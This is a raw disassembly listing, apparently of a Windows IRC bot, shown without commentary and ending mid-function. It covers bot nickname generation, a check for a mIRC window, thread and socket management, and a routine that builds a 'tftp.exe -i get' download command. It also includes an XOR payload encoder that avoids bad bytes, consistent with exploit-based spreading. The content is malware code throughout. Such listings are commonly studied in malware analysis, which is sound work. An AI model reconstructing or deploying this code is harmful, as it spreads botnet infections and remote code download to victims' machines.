lea eax, [ebp-4]
push eax
push esi
call ds:dword_4F5394 ; GetComputerNameA
test eax, eax
jnz short loc_40B0F7
mov esi, offset dword_448008
loc_40B0F7: ; CODE XREF: _0:0040B0F0�j
movsx eax, byte ptr [esi]
push 41h
pop ecx
loc_40B0FD: ; CODE XREF: _0:0040B108�j
cmp eax, ecx
jnz short loc_40B104
xor edi, edi
inc edi
loc_40B104: ; CODE XREF: _0:0040B0FF�j
inc ecx
cmp ecx, 5Bh
jl short loc_40B0FD
push 61h
pop ecx
loc_40B10D: ; CODE XREF: _0:0040B118�j
cmp eax, ecx
jnz short loc_40B114
xor edi, edi
inc edi
loc_40B114: ; CODE XREF: _0:0040B10F�j
inc ecx
cmp ecx, 7Bh
jl short loc_40B10D
test edi, edi
jnz short loc_40B123
mov esi, offset dword_44800C
loc_40B123: ; CODE XREF: _0:0040B11C�j
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_41EC30
xor esi, esi
add esp, 0Ch
cmp ds:dword_43F09C, esi
jle short loc_40B162
loc_40B13C: ; CODE XREF: _0:0040B160�j
call sub_41EB70
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_448010
push 1Ch
push edi
call sub_41EC30
add esp, 14h
inc esi
cmp esi, ds:dword_43F09C
jl short loc_40B13C
loc_40B162: ; CODE XREF: _0:0040B13A�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
pop ecx
lea eax, [ebp-0Ch]
push 0Ah
push eax
push 7
push 800h
call ds:dword_4F5398 ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset dword_448018
push 1Ch
push edi
call sub_41EC30
xor esi, esi
add esp, 10h
cmp ds:dword_43F09C, esi
jle short loc_40B1D7
loc_40B1B1: ; CODE XREF: _0:0040B1D5�j
call sub_41EB70
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_44801C
push 1Ch
push edi
call sub_41EC30
add esp, 14h
inc esi
cmp esi, ds:dword_43F09C
jl short loc_40B1B1
loc_40B1D7: ; CODE XREF: _0:0040B1AF�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 94h
push esi
lea eax, [ebp-94h]
push edi
push eax
mov esi, offset byte_4E3108
mov dword ptr [ebp-94h], 94h
call ds:dword_4F539C ; GetVersionExA
call ds:dword_4F537C ; GetTickCount
push eax
call sub_41EB60
cmp dword ptr [ebp-90h], 4
pop ecx
jnz short loc_40B261
cmp dword ptr [ebp-8Ch], 0
jnz short loc_40B241
cmp dword ptr [ebp-84h], 1
jnz short loc_40B231
mov esi, offset dword_448024
loc_40B231: ; CODE XREF: _0:0040B22A�j
cmp dword ptr [ebp-84h], 2
jnz short loc_40B29D
mov esi, offset dword_448028
jmp short loc_40B29D
; ---------------------------------------------------------------------------
loc_40B241: ; CODE XREF: _0:0040B221�j
cmp dword ptr [ebp-8Ch], 0Ah
jnz short loc_40B251
mov esi, offset dword_44802C
jmp short loc_40B29D
; ---------------------------------------------------------------------------
loc_40B251: ; CODE XREF: _0:0040B248�j
cmp dword ptr [ebp-8Ch], 5Ah
jnz short loc_40B298
mov esi, offset dword_448030
jmp short loc_40B29D
; ---------------------------------------------------------------------------
loc_40B261: ; CODE XREF: _0:0040B218�j
cmp dword ptr [ebp-90h], 5
jnz short loc_40B298
cmp dword ptr [ebp-8Ch], 0
jnz short loc_40B27A
mov esi, offset dword_448034
jmp short loc_40B29D
; ---------------------------------------------------------------------------
loc_40B27A: ; CODE XREF: _0:0040B271�j
cmp dword ptr [ebp-8Ch], 1
jnz short loc_40B28A
mov esi, offset dword_448038
jmp short loc_40B29D
; ---------------------------------------------------------------------------
loc_40B28A: ; CODE XREF: _0:0040B281�j
cmp dword ptr [ebp-8Ch], 2
mov esi, offset dword_44803C
jz short loc_40B29D
loc_40B298: ; CODE XREF: _0:0040B258�j _0:0040B268�j
mov esi, offset dword_448040
loc_40B29D: ; CODE XREF: _0:0040B238�j _0:0040B23F�j ...
mov edi, [ebp+8]
push esi
push offset dword_448044
push 1Ch
push edi
call sub_41EC30
xor esi, esi
add esp, 10h
cmp ds:dword_43F09C, esi
jle short loc_40B2E1
loc_40B2BB: ; CODE XREF: _0:0040B2DF�j
call sub_41EB70
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_44804C
push 1Ch
push edi
call sub_41EC30
add esp, 14h
inc esi
cmp esi, ds:dword_43F09C
jl short loc_40B2BB
loc_40B2E1: ; CODE XREF: _0:0040B2B9�j
mov eax, edi
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B2E7 proc near ; CODE XREF: sub_40B38F+5D�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_4F537C ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
mov esi, eax
cmp esi, 64h
jbe short loc_40B336
push offset aMirc_0 ; "mIRC"
call ds:dword_4E2FD4 ; FindWindowA
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40B31F
mov eax, offset byte_4E3109
loc_40B31F: ; CODE XREF: sub_40B2E7+31�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_41EC30
add esp, 14h
jmp short loc_40B35B
; ---------------------------------------------------------------------------
loc_40B336: ; CODE XREF: sub_40B2E7+1D�j
push offset aMirc_1 ; "mIRC"
call ds:dword_4E2FD4 ; FindWindowA
test eax, eax
mov eax, offset aM_1 ; "[M]"
jnz short loc_40B34F
mov eax, offset word_4E310A
loc_40B34F: ; CODE XREF: sub_40B2E7+61�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_41EA60
pop ecx
pop ecx
loc_40B35B: ; CODE XREF: sub_40B2E7+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_41BC70
pop ecx
cmp eax, 2
pop esi
jbe short loc_40B38A
push 1Ch
lea eax, [ebp+var_1C]
push [ebp+arg_0]
push eax
call sub_41FAC0
lea eax, [ebp+var_1C]
push 1Ch
push eax
push [ebp+arg_0]
call sub_41E510
add esp, 18h
loc_40B38A: ; CODE XREF: sub_40B2E7+82�j
mov eax, [ebp+arg_0]
leave
retn
sub_40B2E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B38F proc near ; CODE XREF: sub_4019A5+7F�p
; sub_401B0B+50�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
xor esi, esi
loc_40B398: ; CODE XREF: sub_40B38F+40�j
cmp [ebp+arg_C], 0
jz short loc_40B3B6
lea eax, aReal[esi] ; "real"
push eax
push [ebp+arg_C]
call sub_41F7E0
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40B3C4
; ---------------------------------------------------------------------------
loc_40B3B6: ; CODE XREF: sub_40B38F+D�j
mov ecx, ds:dword_444314[esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40B3C4: ; CODE XREF: sub_40B38F+25�j
test eax, eax
jnz short loc_40B3D3
add esi, 14h
inc edi
cmp esi, 78h
jb short loc_40B398
jmp short loc_40B3E1
; ---------------------------------------------------------------------------
loc_40B3D3: ; CODE XREF: sub_40B38F+37�j
push [ebp+arg_0]
lea eax, [edi+edi*4]
call ds:off_444318[eax*4]
pop ecx
loc_40B3E1: ; CODE XREF: sub_40B38F+42�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_40B3F4
push [ebp+arg_0]
call sub_40B2E7
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40B3F4: ; CODE XREF: sub_40B38F+58�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40B38F endp
; =============== S U B R O U T I N E =======================================
sub_40B3F9 proc near ; CODE XREF: sub_40B419+A�p
; sub_40B4F1+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_41BC70
push [esp+8+arg_4]
mov esi, eax
call sub_41BC70
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_40B3F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B419 proc near ; CODE XREF: _0:0040B551�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40B3F9
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_40B436
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40B436: ; CODE XREF: sub_40B419+17�j
push ebx
push esi
push edi
push [ebp+arg_8]
call sub_41BC70
push [ebp+arg_C]
mov esi, eax
call sub_41BC70
mov edi, eax
mov ebx, [ebp+arg_0]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov ds:dword_44810C, eax
lea eax, [edi+1]
mov ds:dword_44812D, eax
lea eax, [edi+17h]
mov ds:dword_448125, eax
pop eax
push 74h
sub eax, edi
push offset dword_4480A8
push ebx
mov ds:dword_44813B, eax
call sub_41FBF0
push esi
lea eax, [ebx+74h]
push [ebp+arg_8]
push eax
call sub_41FBF0
add esi, 74h
push 5
push (offset aTftp_exeIGet+0Ch)
lea eax, [esi+ebx]
push eax
call sub_41FBF0
add esi, 5
push edi
push [ebp+arg_C]
lea eax, [esi+ebx]
push eax
call sub_41FBF0
add esi, edi
push 10h
push (offset aTftp_exeIGet+11h)
lea eax, [esi+ebx]
push eax
call sub_41FBF0
add esp, 44h
add esi, 10h
push edi
lea eax, [esi+ebx]
push [ebp+arg_C]
push eax
call sub_41FBF0
add esi, edi
push 38h
add esi, ebx
push offset byte_448131
push esi
call sub_41FBF0
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40B419 endp
; =============== S U B R O U T I N E =======================================
sub_40B4F1 proc near ; CODE XREF: _0:0040B515�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40B3F9
push eax
call sub_40B575
add esp, 0Ch
retn
sub_40B4F1 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+10h]
push edi
mov edi, [ebp+14h]
push edi
push ebx
call sub_40B4F1
cmp eax, [ebp+0Ch]
pop ecx
pop ecx
ja short loc_40B528
cmp eax, 0FFFFh
jbe short loc_40B52C
loc_40B528: ; CODE XREF: _0:0040B51F�j
xor eax, eax
jmp short loc_40B571
; ---------------------------------------------------------------------------
loc_40B52C: ; CODE XREF: _0:0040B526�j
push esi
push edi
push ebx
call sub_40B3F9
add eax, 101h
push eax
call sub_41BE40
add esp, 0Ch
mov esi, eax
push edi
push ebx
push edi
push ebx
call sub_40B3F9
pop ecx
pop ecx
push eax
push esi
call sub_40B419
push eax
push esi
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40B590
push esi
mov edi, eax
call sub_41C9D0
add esp, 24h
mov eax, edi
pop esi
loc_40B571: ; CODE XREF: _0:0040B52A�j
pop edi
pop ebx
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_40B575 proc near ; CODE XREF: sub_40B4F1+E�p
; sub_40B590+47�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_40B57E
inc ecx
loc_40B57E: ; CODE XREF: sub_40B575+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_40B575 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B590 proc near ; CODE XREF: _0:0040B55E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_C]
cmp dl, 0Ah
jz short loc_40B5AA
cmp dl, 0Dh
jz short loc_40B5AA
cmp dl, 5Ch
jz short loc_40B5AA
test dl, dl
jnz short loc_40B5AE
loc_40B5AA: ; CODE XREF: sub_40B590+A�j
; sub_40B590+F�j ...
inc edx
mov [ebp+arg_C], edx
loc_40B5AE: ; CODE XREF: sub_40B590+18�j
push esi
mov esi, 0FFh
cmp edx, esi
jbe short loc_40B5D6
mov eax, edx
shr eax, 8
cmp al, 0Ah
jz short loc_40B5CD
cmp al, 0Dh
jz short loc_40B5CD
cmp al, 5Ch
jz short loc_40B5CD
test al, al
jnz short loc_40B5D6
loc_40B5CD: ; CODE XREF: sub_40B590+2F�j
; sub_40B590+33�j ...
add edx, 100h
mov [ebp+arg_C], edx
loc_40B5D6: ; CODE XREF: sub_40B590+26�j
; sub_40B590+3B�j
push edx
call sub_40B575
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_40B5EC
cmp eax, 0FFFFh
jbe short loc_40B5F3
loc_40B5EC: ; CODE XREF: sub_40B590+53�j
xor eax, eax
jmp loc_40B68E
; ---------------------------------------------------------------------------
loc_40B5F3: ; CODE XREF: sub_40B590+5A�j
push ebx
mov bl, ds:byte_4E310C
xor ecx, ecx
push edi
mov edi, [ebp+arg_8]
test edx, edx
jbe short loc_40B620
loc_40B604: ; CODE XREF: sub_40B590+8E�j
mov al, [ecx+edi]
xor al, bl
jz short loc_40B617
cmp al, 0Ah
jz short loc_40B617
cmp al, 0Dh
jz short loc_40B617
cmp al, 5Ch
jnz short loc_40B61B
loc_40B617: ; CODE XREF: sub_40B590+79�j
; sub_40B590+7D�j ...
inc bl
xor ecx, ecx
loc_40B61B: ; CODE XREF: sub_40B590+85�j
inc ecx
cmp ecx, edx
jb short loc_40B604
loc_40B620: ; CODE XREF: sub_40B590+72�j
cmp edx, esi
mov ds:byte_4E310C, bl
ja short loc_40B64C
push 15h
push offset loc_448090
push [ebp+arg_0]
mov ds:byte_44809D, dl
mov ds:byte_4480A1, bl
call sub_41FBF0
add esp, 0Ch
push 15h
jmp short loc_40B66D
; ---------------------------------------------------------------------------
loc_40B64C: ; CODE XREF: sub_40B590+98�j
push 17h
push offset loc_448078
push [ebp+arg_0]
mov ds:word_448086, dx
mov ds:byte_44808B, bl
call sub_41FBF0
add esp, 0Ch
push 17h
loc_40B66D: ; CODE XREF: sub_40B590+BA�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_40B689
mov edx, [ebp+arg_0]
lea esi, [ecx+edx]
loc_40B67B: ; CODE XREF: sub_40B590+F7�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_40B67B
loc_40B689: ; CODE XREF: sub_40B590+E3�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_40B68E: ; CODE XREF: sub_40B590+5E�j
pop esi
leave
retn
sub_40B590 endp
; =============== S U B R O U T I N E =======================================
sub_40B691 proc near ; CODE XREF: sub_401404+366�p
; sub_401404+3A2�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_455D00
loc_40B699: ; CODE XREF: sub_40B691+18�j
cmp byte ptr [eax], 0
jz short loc_40B6AD
add eax, 234h
inc edi
cmp eax, offset dword_4E2D00
jl short loc_40B699
jmp short loc_40B6F8
; ---------------------------------------------------------------------------
loc_40B6AD: ; CODE XREF: sub_40B691+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_455D00[esi]
push eax
call sub_41E510
mov eax, [esp+14h+arg_4]
and ds:dword_455F04[esi], 0
and ds:dword_455F08[esi], 0
mov ds:dword_455F00[esi], eax
mov eax, [esp+14h+arg_8]
add esp, 0Ch
and ds:byte_455F18[esi], 0
mov ds:dword_455F0C[esi], eax
pop esi
loc_40B6F8: ; CODE XREF: sub_40B691+1A�j
mov eax, edi
pop edi
retn
sub_40B691 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B6FC proc near ; DATA XREF: sub_401C87+2949�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
push [ebp+var_10]
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_40B74E
push [ebp+var_14]
call sub_40B9A7
add esp, 14h
push 0
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_40B6FC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B74E proc near ; CODE XREF: sub_40B6FC+38�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_44816C
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
xor edi, edi
mov esi, offset dword_455D00
loc_40B778: ; CODE XREF: sub_40B74E+78�j
cmp byte ptr [esi], 0
jz short loc_40B7B9
cmp [ebp+arg_C], 0
jnz short loc_40B78C
cmp dword ptr [esi+204h], 0
jnz short loc_40B7B9
loc_40B78C: ; CODE XREF: sub_40B74E+33�j
push esi
push edi
lea eax, [ebp+var_200]
push offset dword_448180
push eax
call sub_41EA60
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 24h
loc_40B7B9: ; CODE XREF: sub_40B74E+2D�j
; sub_40B74E+3C�j
add esi, 234h
inc edi
cmp esi, offset dword_4E2D00
jl short loc_40B778
pop edi
pop esi
leave
retn
sub_40B74E endp
; =============== S U B R O U T I N E =======================================
sub_40B7CC proc near ; CODE XREF: sub_401C87+7C16�p
; sub_40B854+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_40B84E
cmp esi, 400h
jge short loc_40B84E
imul esi, 234h
push edi
push ebx
lea edi, dword_455F14[esi]
push dword ptr [edi]
call ds:dword_4F5380 ; TerminateThread
cmp [edi], ebx
jz short loc_40B7FE
inc ebp
loc_40B7FE: ; CODE XREF: sub_40B7CC+2F�j
mov [edi], ebx
lea edi, dword_455F08[esi]
mov ds:dword_455F00[esi], ebx
mov ds:dword_455F04[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_40B81F
push eax
call sub_41A652
pop ecx
loc_40B81F: ; CODE XREF: sub_40B7CC+4A�j
mov [edi], ebx
lea edi, dword_455F0C[esi]
mov byte ptr ds:dword_455D00[esi], bl
mov ds:byte_455F18[esi], bl
push dword ptr [edi]
call ds:dword_4E3060 ; closesocket
lea esi, dword_455F10[esi]
mov [edi], ebx
push dword ptr [esi]
call ds:dword_4E3060 ; closesocket
mov [esi], ebx
pop edi
loc_40B84E: ; CODE XREF: sub_40B7CC+D�j
; sub_40B7CC+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_40B7CC endp
; =============== S U B R O U T I N E =======================================
sub_40B854 proc near ; CODE XREF: sub_401300+18�p
; sub_401404:loc_401991�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_455D00
loc_40B860: ; CODE XREF: sub_40B854+2A�j
cmp byte ptr [esi], 0
jz short loc_40B871
push edi
call sub_40B7CC
test eax, eax
pop ecx
jz short loc_40B871
inc ebx
loc_40B871: ; CODE XREF: sub_40B854+F�j
; sub_40B854+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_4E2D00
jl short loc_40B860
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_40B854 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B886 proc near ; CODE XREF: sub_401C87+4169�p
; sub_401C87+42B7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_455F04
loc_40B89A: ; CODE XREF: sub_40B886+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_40B8BC
test edi, edi
jle short loc_40B8AE
cmp [esi], edi
jz short loc_40B8AE
cmp ebx, edi
jnz short loc_40B8BC
loc_40B8AE: ; CODE XREF: sub_40B886+1E�j
; sub_40B886+22�j
push ebx
call sub_40B7CC
test eax, eax
pop ecx
jz short loc_40B8BC
inc [ebp+var_4]
loc_40B8BC: ; CODE XREF: sub_40B886+1A�j
; sub_40B886+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_4E2F04
jl short loc_40B89A
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_40B886 endp
; =============== S U B R O U T I N E =======================================
sub_40B8D3 proc near ; CODE XREF: sub_401404+3FA�p
; sub_401C87+93D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_455F00
loc_40B8DA: ; CODE XREF: sub_40B8D3+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_40B8E3
inc eax
loc_40B8E3: ; CODE XREF: sub_40B8D3+D�j
add ecx, 234h
cmp ecx, offset dword_4E2F00
jl short loc_40B8DA
retn
sub_40B8D3 endp
; =============== S U B R O U T I N E =======================================
sub_40B8F2 proc near ; CODE XREF: sub_401C87+23E1�p
arg_0 = dword ptr 4
xor eax, eax
xor edx, edx
mov ecx, offset dword_455F00
push esi
loc_40B8FC: ; CODE XREF: sub_40B8F2+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_40B915
add ecx, 234h
inc edx
cmp ecx, offset dword_4E2F00
jl short loc_40B8FC
pop esi
retn
; ---------------------------------------------------------------------------
loc_40B915: ; CODE XREF: sub_40B8F2+10�j
mov eax, edx
pop esi
retn
sub_40B8F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B919 proc near ; CODE XREF: sub_401C87+1017�p
; sub_401C87+121D�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_40B932
push [ebp+arg_1C]
call sub_41E710
pop ecx
loc_40B932: ; CODE XREF: sub_40B919+E�j
push eax
push [ebp+arg_18]
call sub_40B886
pop ecx
test eax, eax
pop ecx
jle short loc_40B95E
push eax
lea eax, [ebp+var_200]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s %s stopped. (%d thread(s) stopped.)"
push eax
call sub_41EA60
add esp, 14h
jmp short loc_40B978
; ---------------------------------------------------------------------------
loc_40B95E: ; CODE XREF: sub_40B919+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s No %s thread found."
push eax
call sub_41EA60
add esp, 10h
loc_40B978: ; CODE XREF: sub_40B919+43�j
cmp [ebp+arg_C], 0
jnz short loc_40B998
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
add esp, 14h
loc_40B998: ; CODE XREF: sub_40B919+63�j
lea eax, [ebp+var_200]
push eax
call sub_415A3C
pop ecx
leave
retn
sub_40B919 endp
; =============== S U B R O U T I N E =======================================
sub_40B9A7 proc near ; CODE XREF: sub_4019A5+154�p
; sub_40B6FC+40�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov ds:dword_455F14[eax], ecx
mov ds:dword_455F00[eax], ecx
mov ds:dword_455F04[eax], ecx
mov ds:dword_455F08[eax], ecx
mov ds:dword_455F0C[eax], ecx
mov ds:dword_455F10[eax], ecx
mov byte ptr ds:dword_455D00[eax], cl
mov ds:byte_455F18[eax], cl
retn
sub_40B9A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B9E4 proc near ; CODE XREF: sub_401C87+7E9D�p
; sub_40BB0C+61�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
push esi
mov esi, [ebp+arg_0]
inc eax
jmp short loc_40BA46
; ---------------------------------------------------------------------------
loc_40B9F0: ; CODE XREF: sub_40B9E4+66�j
cmp eax, 1
jnz short loc_40BA57
mov edx, [ebp+arg_4]
mov dl, [edx]
test dl, dl
jz short loc_40BA57
cmp cl, 2Ah
jz short loc_40BA2F
cmp cl, 3Fh
jz short loc_40BA14
cmp cl, 5Bh
jz short loc_40BA19
xor eax, eax
cmp cl, dl
setz al
loc_40BA14: ; CODE XREF: sub_40B9E4+22�j
inc [ebp+arg_4]
jmp short loc_40BA42
; ---------------------------------------------------------------------------
loc_40BA19: ; CODE XREF: sub_40B9E4+27�j
lea eax, [ebp+arg_4]
inc esi
push eax
lea eax, [ebp+arg_0]
push eax
mov [ebp+arg_0], esi
call sub_40BA78
mov esi, [ebp+arg_0]
jmp short loc_40BA40
; ---------------------------------------------------------------------------
loc_40BA2F: ; CODE XREF: sub_40B9E4+1D�j
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+arg_0]
push eax
call sub_40BB0C
mov esi, [ebp+arg_0]
dec esi
loc_40BA40: ; CODE XREF: sub_40B9E4+49�j
pop ecx
pop ecx
loc_40BA42: ; CODE XREF: sub_40B9E4+33�j
inc esi
mov [ebp+arg_0], esi
loc_40BA46: ; CODE XREF: sub_40B9E4+A�j
mov cl, [esi]
test cl, cl
jnz short loc_40B9F0
jmp short loc_40BA57
; ---------------------------------------------------------------------------
loc_40BA4E: ; CODE XREF: sub_40B9E4+76�j
cmp eax, 1
jnz short loc_40BA73
inc esi
mov [ebp+arg_0], esi
loc_40BA57: ; CODE XREF: sub_40B9E4+F�j
; sub_40B9E4+18�j ...
cmp byte ptr [esi], 2Ah
jz short loc_40BA4E
cmp eax, 1
jnz short loc_40BA73
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jnz short loc_40BA73
cmp byte ptr [esi], 0
jnz short loc_40BA73
xor eax, eax
inc eax
jmp short loc_40BA75
; ---------------------------------------------------------------------------
loc_40BA73: ; CODE XREF: sub_40B9E4+6D�j
; sub_40B9E4+7B�j ...
xor eax, eax
loc_40BA75: ; CODE XREF: sub_40B9E4+8D�j
pop esi
pop ebp
retn
sub_40B9E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BA78 proc near ; CODE XREF: sub_40B9E4+41�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, [ebp+arg_0]
push edi
xor edi, edi
xor eax, eax
mov ecx, [edx]
and [ebp+var_8], edi
inc eax
cmp byte ptr [ecx], 21h
mov [ebp+var_4], eax
jnz short loc_40BA99
inc ecx
mov [ebp+var_8], eax
mov [edx], ecx
loc_40BA99: ; CODE XREF: sub_40BA78+19�j
push ebx
push esi
loc_40BA9B: ; CODE XREF: sub_40BA78+77�j
mov ecx, [edx]
mov bl, [ecx]
cmp bl, 5Dh
jnz short loc_40BAA9
cmp [ebp+var_4], eax
jnz short loc_40BAF1
loc_40BAA9: ; CODE XREF: sub_40BA78+2A�j
test edi, edi
jnz short loc_40BAE6
cmp bl, 2Dh
jnz short loc_40BADA
lea esi, [ecx+1]
mov cl, [ecx-1]
mov al, [esi]
cmp cl, al
jge short loc_40BADA
cmp al, 5Dh
jz short loc_40BADA
cmp [ebp+var_4], edi
jnz short loc_40BADA
mov ebx, [ebp+arg_4]
mov ebx, [ebx]
mov bl, [ebx]
cmp bl, cl
jl short loc_40BAE6
cmp bl, al
jg short loc_40BAE6
mov [edx], esi
jmp short loc_40BAE3
; ---------------------------------------------------------------------------
loc_40BADA: ; CODE XREF: sub_40BA78+38�j
; sub_40BA78+44�j ...
mov eax, [ebp+arg_4]
mov eax, [eax]
cmp bl, [eax]
jnz short loc_40BAE6
loc_40BAE3: ; CODE XREF: sub_40BA78+60�j
xor edi, edi
inc edi
loc_40BAE6: ; CODE XREF: sub_40BA78+33�j
; sub_40BA78+58�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
xor eax, eax
inc eax
jmp short loc_40BA9B
; ---------------------------------------------------------------------------
loc_40BAF1: ; CODE XREF: sub_40BA78+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_40BAFE
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_40BAFE: ; CODE XREF: sub_40BA78+7E�j
cmp edi, eax
jnz short loc_40BB07
